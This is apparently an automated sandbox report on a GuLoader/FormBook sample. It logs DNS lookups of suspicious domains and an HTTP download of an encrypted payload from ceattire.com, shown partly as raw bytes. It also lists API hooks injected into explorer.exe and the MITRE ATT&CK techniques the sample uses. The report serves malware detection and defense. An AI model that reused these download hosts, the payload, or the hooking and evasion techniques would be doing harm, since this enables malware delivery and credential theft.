Jul 14, 2021 20:05:31.159765959 CEST	64910	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:31.174938917 CEST	53	64910	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:31.840729952 CEST	52123	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:31.854331017 CEST	53	52123	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:32.783510923 CEST	56130	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:32.797126055 CEST	53	56130	8.8.8.8	192.168.2.3
Jul 14, 2021 20:05:33.701818943 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:05:33.714417934 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 14, 2021 20:07:23.171504974 CEST	59420	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:07:23.232844114 CEST	53	59420	8.8.8.8	192.168.2.3
Jul 14, 2021 20:07:23.625946999 CEST	58784	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:07:23.660377979 CEST	53	58784	8.8.8.8	192.168.2.3
Jul 14, 2021 20:07:29.007955074 CEST	63978	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:07:29.035301924 CEST	53	63978	8.8.8.8	192.168.2.3
Jul 14, 2021 20:07:33.390911102 CEST	62938	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:07:33.404918909 CEST	53	62938	8.8.8.8	192.168.2.3
Jul 14, 2021 20:07:33.698745012 CEST	55708	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:07:33.725893974 CEST	53	55708	8.8.8.8	192.168.2.3
Jul 14, 2021 20:08:58.467015982 CEST	56803	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:08:58.614542007 CEST	53	56803	8.8.8.8	192.168.2.3
Jul 14, 2021 20:09:37.891772032 CEST	57145	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:09:37.949995041 CEST	53	57145	8.8.8.8	192.168.2.3
Jul 14, 2021 20:09:56.231909990 CEST	55359	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:09:56.246475935 CEST	53	55359	8.8.8.8	192.168.2.3
Jul 14, 2021 20:09:56.666476011 CEST	58306	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:09:56.694113016 CEST	53	58306	8.8.8.8	192.168.2.3
Jul 14, 2021 20:09:58.241312027 CEST	64124	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:09:58.317758083 CEST	53	64124	8.8.8.8	192.168.2.3
Jul 14, 2021 20:10:19.070988894 CEST	49361	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:10:19.199385881 CEST	53	49361	8.8.8.8	192.168.2.3
Jul 14, 2021 20:10:29.468688011 CEST	63150	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:10:29.496061087 CEST	53	63150	8.8.8.8	192.168.2.3
Jul 14, 2021 20:10:40.040930033 CEST	53279	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:10:40.198004961 CEST	53	53279	8.8.8.8	192.168.2.3
Jul 14, 2021 20:11:03.246819019 CEST	56881	53	192.168.2.3	8.8.8.8
Jul 14, 2021 20:11:03.429352045 CEST	53	56881	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 14, 2021 20:08:58.467015982 CEST	192.168.2.3	8.8.8.8	0x81b8	Standard query (0)	ceattire.com	A (IP address)	IN (0x0001)
Jul 14, 2021 20:09:37.891772032 CEST	192.168.2.3	8.8.8.8	0x42de	Standard query (0)	www.dating-web.site	A (IP address)	IN (0x0001)
Jul 14, 2021 20:09:58.241312027 CEST	192.168.2.3	8.8.8.8	0x47ab	Standard query (0)	www.stonalogov.com	A (IP address)	IN (0x0001)
Jul 14, 2021 20:10:19.070988894 CEST	192.168.2.3	8.8.8.8	0xead2	Standard query (0)	www.gentrypartyof8.com	A (IP address)	IN (0x0001)
Jul 14, 2021 20:10:40.040930033 CEST	192.168.2.3	8.8.8.8	0xdcf9	Standard query (0)	www.bloomandbrewcafe.com	A (IP address)	IN (0x0001)
Jul 14, 2021 20:11:03.246819019 CEST	192.168.2.3	8.8.8.8	0x7b7a	Standard query (0)	www.automotivevita.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 14, 2021 20:07:23.232844114 CEST	8.8.8.8	192.168.2.3	0x3a13	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jul 14, 2021 20:08:58.614542007 CEST	8.8.8.8	192.168.2.3	0x81b8	No error (0)	ceattire.com		185.211.56.131	A (IP address)	IN (0x0001)
Jul 14, 2021 20:09:37.949995041 CEST	8.8.8.8	192.168.2.3	0x42de	No error (0)	www.dating-web.site		64.190.62.111	A (IP address)	IN (0x0001)
Jul 14, 2021 20:09:56.246475935 CEST	8.8.8.8	192.168.2.3	0x9c75	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jul 14, 2021 20:09:58.317758083 CEST	8.8.8.8	192.168.2.3	0x47ab	Name error (3)	www.stonalogov.com	none	none	A (IP address)	IN (0x0001)
Jul 14, 2021 20:10:19.199385881 CEST	8.8.8.8	192.168.2.3	0xead2	No error (0)	www.gentrypartyof8.com	gentrypartyof8.com		CNAME (Canonical name)	IN (0x0001)
Jul 14, 2021 20:10:19.199385881 CEST	8.8.8.8	192.168.2.3	0xead2	No error (0)	gentrypartyof8.com		66.235.200.146	A (IP address)	IN (0x0001)
Jul 14, 2021 20:10:40.198004961 CEST	8.8.8.8	192.168.2.3	0xdcf9	No error (0)	www.bloomandbrewcafe.com	137gate.com		CNAME (Canonical name)	IN (0x0001)
Jul 14, 2021 20:10:40.198004961 CEST	8.8.8.8	192.168.2.3	0xdcf9	No error (0)	137gate.com		31.44.185.28	A (IP address)	IN (0x0001)
Jul 14, 2021 20:11:03.429352045 CEST	8.8.8.8	192.168.2.3	0x7b7a	Server failure (2)	www.automotivevita.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ceattire.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49752	185.211.56.131	80	C:\Users\user\Desktop\ZGNX11JMSc.exe

Timestamp	kBytes transferred	Direction	Data
Jul 14, 2021 20:08:59.924114943 CEST	6599	OUT	GET /bin_UYDMbHwI28.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: ceattire.com Cache-Control: no-cache
Jul 14, 2021 20:09:00.014100075 CEST	6601	IN	HTTP/1.1 200 OK Date: Wed, 14 Jul 2021 18:05:23 GMT Server: Apache/2 Last-Modified: Tue, 13 Jul 2021 16:59:16 GMT ETag: "2d640-5c704287dec39" Accept-Ranges: bytes Content-Length: 185920 Vary: Accept-Encoding,User-Agent Content-Type: application/octet-stream Data Raw: 0c e8 5c 8f 9e 71 2c 8b 27 a6 36 6d 35 4c c7 7d a1 54 92 a4 59 68 4d b5 d8 3d 0b a0 be 75 d8 be 55 dc 84 4a 9f 1f 0c a0 5d c7 34 1c 77 f9 12 6a 97 39 17 db 06 64 0c fd a4 18 73 63 38 3a b1 1a 8c 01 0a 04 a1 73 98 5f 3a f9 a8 14 b9 b0 6f 25 28 e6 c0 2e c7 39 83 96 95 d6 20 68 bb c0 0f 49 a7 43 4f 40 03 a7 3c c4 c8 f2 ec 02 6e ef 3a 5b 3e e7 ac 7c b8 ac 38 f7 d4 0d 70 20 79 bd 04 9f 0e 2c ee 1f b1 3e 8c ef 22 25 13 95 7b 0c 34 06 9f d9 3e fd a8 2e 64 4f d2 47 82 cf 6a d6 31 82 72 90 56 8b 0d a1 74 c7 e2 a7 ef ff 61 94 59 b5 df 9e 46 d0 98 b1 82 6a 7d 7c 4c 3e 15 c8 76 0c 52 96 08 62 ed 2b 1e 6c ac 9f d1 da 9d ab 80 91 ca 18 8b 08 b1 31 e2 a9 40 25 0b 84 89 21 9f c1 54 f3 bf a5 7c 84 19 48 ed c6 c1 cd ff fe 70 b1 e5 ba 31 95 50 32 e7 7e 0e af b4 86 3c 9d ec c6 0b 93 93 17 aa 9f e9 b4 7a 42 ff 62 74 c9 00 3e df 10 54 4f dc c6 b3 d7 8b 1b 7e 2c 41 14 c8 27 61 5e de 76 03 d8 e0 e2 59 fe 34 37 f6 58 60 ff 60 56 83 81 45 a3 ca f1 29 4d ff 64 da b3 2e c5 db d1 a6 01 1e d2 dc 9d 4d 58 df c2 6d 36 0e a4 ed 76 e8 8a b8 6f f1 2e 3e 13 b5 39 0f fe ad 71 ee 3f 85 a3 c4 df ed 74 93 7e b6 5e 5f 37 76 d8 3a e7 c5 15 60 f6 7c cc a4 e9 28 c1 40 5b d5 75 80 b5 43 fa 9b 8e 30 df 06 f0 a2 5d b5 42 38 83 dd 4f 04 74 9f 36 76 ee f3 02 4f c5 9f d5 32 be 93 38 26 eb 30 0e 5e 80 c6 3c 00 d5 ff 19 d6 c6 9d be b6 84 21 e2 f1 2f 33 be 15 7b f9 72 37 fa d2 ef 8c 98 38 a6 1a ef 66 b3 ed cb d6 27 af 8f e4 22 2b c2 1c e4 7f d9 61 57 9d d5 84 36 5c 3f cb 75 ae f9 84 a0 cb 42 67 5b cb 37 5f 9d 0f f3 a2 ab 0f c7 b1 fb 34 41 d4 5a 97 27 c4 27 be c2 4e 12 8d 95 6e f9 a7 b7 27 e6 7a aa 02 e0 9a 8c 64 c4 58 91 b3 b9 ea 04 af d1 94 15 5e c0 b5 6c 5a 9a 64 dd 3e e7 a8 bf bc a1 e6 1b 90 57 71 43 25 29 21 57 83 8d 1f 31 48 33 a0 50 a7 b3 cc c5 fd 35 bc 10 b6 3d 98 3b c7 0e 3b 1d 16 5a a6 5c 7c af 35 ec 8f 11 5d 5e ba 12 30 15 11 45 e3 78 f4 b2 e3 b1 ca 09 0c ec 04 02 08 4b cd f8 39 c2 d6 52 76 4a af 63 68 ce 64 1e a7 54 ee 39 a5 55 82 5f b6 9f 3c 0f c2 0a 02 1d 24 d8 85 37 4e d7 27 a9 a7 55 3a a9 ea 38 3a 02 70 78 bf 7c 71 9a 80 88 17 20 a0 2c e5 89 63 43 e0 0b 41 37 9f 2a ba 5c 8e 20 18 f4 2e 20 39 95 ba 47 3b ac c6 ac 50 28 8c fb 87 db aa ee ad 33 92 43 73 9d a6 6b c7 f5 d1 57 74 6b e3 cd 18 c5 43 cd 89 f5 73 84 8e 27 06 f0 f7 f9 1f 1a f3 de 85 ba 58 28 dd 02 b1 26 20 2c 1e 0d 0c e0 20 19 6b 34 58 1a f5 4e 95 70 b9 58 03 6c ea 76 b7 3d cf fa 42 fe 72 63 a2 dd bf 94 37 ef 32 e5 a0 b4 5a 32 17 a4 ec 08 e1 cd 35 6e 4c a1 77 50 8d 4a 20 61 b2 a2 7d 80 d2 1a c2 05 bd 4c 0d 7e ff 3b 75 15 a8 f3 77 da 56 2a 9e 3c f3 70 0e 39 cf 94 60 f3 3d ab ce 19 16 43 f1 44 0e 47 61 90 b0 88 61 39 73 3d e2 2a 89 4b a7 49 ef 27 64 23 6c b8 c0 45 b9 cb ad 35 2c d8 69 01 44 34 b1 6d bd 79 b3 83 e8 63 f2 df c0 1d 77 28 ec 6d 63 b8 a1 02 a0 3c 8a a1 8b c1 5b 4f 56 49 73 98 5f 3a a1 2b fc b0 3b a7 a6 e8 da 4b 2e c4 f8 00 56 bd d5 28 97 5a 50 0f 49 a7 43 4f 40 03 a7 3c c4 c8 f2 ec 02 6e ef 3a 5b 3e e7 ac 7c b8 ac 38 f7 d4 0d 70 20 b9 bd 04 9f 00 33 54 11 b1 8a 85 22 03 9d 12 d9 b6 2d 60 6e f6 aa 1e 8d da 41 03 3d b3 2a a2 ac 0b b8 5f ed 06 b0 34 ee 2d d3 01 a9 c2 ce 81 df 25 db 0a 95 b2 f1 22 b5 b6 bc 8f 60 59 7c 4c 3e 15 c8 76 0c f9 6a 00 88 02 b6 78 d5 43 02 b7 63 72 36 e6 28 3e 18 46 b1 18 ac 84 10 b4 25 f3 3d 65 bc Data Ascii: \q,'6m5L}TYhM=uUJ]4wj9dsc8:s_:o%(.9 hICO@<n:[>\|8p y,>"%{4>.dOGj1rVtaYFj}\|L>vRb+l1@%!T\|Hp1P2~<zBbt>TO~,A'a^vY47X``VE)Md.MXm6vo.>9q?t~^_7v:`\|(@[uC0]B8Ot6vO28&0^<!/3{r78f'"+aW6\?uBg[7_4AZ''Nn'zdX^lZd>WqC%)!W1H3P5=;;Z\\|5]^0ExK9RvJchdT9U_<$7N'U:8:px\|q ,cCA7\ . 9G;P(3CskWtkCs'X(& , k4XNpXlv=Brc72Z25nLwPJ a}L~;uwV<p9`=CDGaa9s=KI'd#lE5,iD4mycw(mc<[OVIs_:+;K.V(ZPICO@<n:[>\|8p 3T"-`nA=_4-%"`Y\|L>vjxCcr6(>F%=e

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xEE
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xEE
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xEE
GetMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xEE

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: ZGNX11JMSc.exe PID: 3152 Parent PID: 5676

General

Start time:	20:02:39
Start date:	14/07/2021
Path:	C:\Users\user\Desktop\ZGNX11JMSc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Imagebase:	0x400000
File size:	267376 bytes
MD5 hash:	FCFB0EC70F1419EDE8A534CC95CB61E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.623756181.0000000002240000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000001.00000000.213217103.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000001.00000002.623260641.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: ZGNX11JMSc.exe PID: 5880 Parent PID: 3152

General

Start time:	20:05:49
Start date:	14/07/2021
Path:	C:\Users\user\Desktop\ZGNX11JMSc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Imagebase:	0x400000
File size:	267376 bytes
MD5 hash:	FCFB0EC70F1419EDE8A534CC95CB61E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000024.00000000.621430446.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ZGNX11JMSc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries